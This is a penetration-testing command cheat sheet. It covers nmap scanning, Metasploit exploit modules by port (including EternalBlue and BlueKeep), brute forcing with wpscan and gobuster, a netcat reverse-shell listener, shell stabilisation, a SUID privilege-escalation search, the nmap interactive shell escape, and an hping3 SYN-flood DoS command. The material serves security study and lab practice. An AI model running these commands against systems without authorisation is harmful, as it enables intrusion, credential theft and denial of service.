Cybersecurity Command Reference Guide
Recon-ng Commands
- marketplace search: Search for available modules.
- marketplace install <module_path>: Install a specific module from the marketplace.
- modules load <module_path>: Load the installed module for use.
- options set SOURCE <url>: Set the target source or URL.
- info: Get information about the loaded module.
- run: Execute the module.
Nmap Commands - Basic Scanning
- nmap -sn <ip>: Check if a host is up (ping scan, no port scan).
- nmap website.com: Scan a host by domain name; Nmap resolves the name to an IP address first.
- nmap -sS <ip>: Perform a stealth SYN port scan (requires root privileges).
OS Detection
- nmap -sn <your_ip_prefix>.1-255: Ping-scan the entire local /24 subnet (e.g., 192.168.1.1-255).
- sudo nmap -O <ip>: Attempt OS detection (requires root privileges).
- sudo nmap -O --osscan-guess <target_ip>: Guess the OS more aggressively when no exact match is found.
Version Detection
- nmap -sS <ip>: Initial port scan.
- nmap -sS <ip> -p <port> -sV: Detect the service version on a specific port.
Advanced Port Scanning
TCP Scan:
- nmap -sT <ip>: Perform a TCP connect scan.
- nmap -sT <ip> -p <port>: TCP connect scan on a specific port.
FIN Scan:
- nmap -sF <ip>: Perform a FIN scan.
- nmap -sF <ip> -p <port>: FIN scan on a specific port.
UDP Scan:
- nmap -sU <ip>: Perform a UDP scan.
Aggressive Scan:
- nmap -A <ip>: Perform OS detection, version detection, script scanning, and traceroute.
NULL Scan:
- nmap -sN <ip>: Perform a NULL scan (no TCP flags set).
XMAS Scan:
- nmap -sX <ip>: Perform an Xmas tree scan (FIN, PSH, and URG flags set).
Firewall Bypass
- nmap -O -Pn <target>: Skip host discovery (-Pn) and run OS detection, so hosts that drop ping probes are still scanned.
Full TCP Scan with Version Detection
- nmap -p- -sV <ip>: Scan all 65535 TCP ports and detect service versions.
Metasploit Framework for FTP (Port 21)
- msfconsole: Start Metasploit Framework.
- search <version>: Search for exploit modules.
- use <module>: Select an exploit module.
- set RHOST <target>: Set the target IP.
- show options: Show required parameters.
- exploit: Run the exploit.
Telnet Credential Capture using Wireshark
- telnet <target_ip>: Start telnet session.
- Use Wireshark to capture the traffic, then right-click a packet -> Follow -> TCP Stream to view the credentials (Telnet sends them in cleartext).
- Brute-force: Use msfconsole with a user file and a password file for automation.
robots.txt
- robots.txt is a plain text file placed at the root of a domain that tells crawlers which paths not to index.
- URL example: https://example.com/robots.txt
Brute Force Attacks
- gobuster dir -u <ip> -w <wordlist>: Discover hidden directories.
- wpscan --url <login_page> -U <user> -P <wordlist>: Brute-force WordPress login.
PHP Reverse Shell
- locate php-re*: Locate reverse shell scripts.
- gedit reverseshell.php: Edit or create a reverse shell script.
Netcat (nc)
- nc [options] [target IP] [port]: Basic syntax.
- nc -lvp 443: Listen (-l) on port 443 (-p) with verbose output (-v).
Use Cases:
- Reverse shells
- File transfers
- Port scanning
Reverse Shell Stabilization
- python -c 'import pty;pty.spawn("/bin/bash")': Spawn a pseudo-TTY to upgrade a limited shell into an interactive one.
Find SUID Files
- find / -perm -4000 -type f 2>/dev/null: Search for all SUID binaries.
Interactive Nmap Shell
- nmap --interactive: Open interactive mode (only available in old Nmap versions, 2.02 to 5.21; removed in later releases).
- !whoami: Run a shell command from interactive mode.
- !ls /root: Access the root directory (if permitted).
Metasploit Modules by Ports
Port 21 - FTP:
- exploit/unix/ftp/vsftpd_234_backdoor
- exploit/windows/ftp/slmail_user
Port 22 - SSH:
- auxiliary/scanner/ssh/ssh_login
- auxiliary/scanner/ssh/ssh_version
Port 23 - Telnet:
- auxiliary/scanner/telnet/telnet_login
Port 80/443 - HTTP/HTTPS:
- exploit/unix/webapp/wp_admin_shell_upload
- exploit/windows/http/manageengine_connectionid_write
- auxiliary/scanner/http/http_version
- auxiliary/scanner/http/dir_scanner
Port 139/445 - SMB:
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/psexec
Port 3389 - RDP:
- auxiliary/scanner/rdp/rdp_scanner
- auxiliary/dos/windows/rdp/bluekeep
Port 3306 - MySQL:
- auxiliary/scanner/mysql/mysql_login
- auxiliary/admin/mysql/mysql_sql
- exploit/linux/mysql/mysql_udf_payload
DoS Attack with hping3
- sudo hping3 -i u1 -S -p 80 <target_ip>
- -i u1: Interval of 1 microsecond per packet.
- -S: Send SYN packets (simulate TCP connection request).
- -p: Target port (e.g., 80 for HTTP).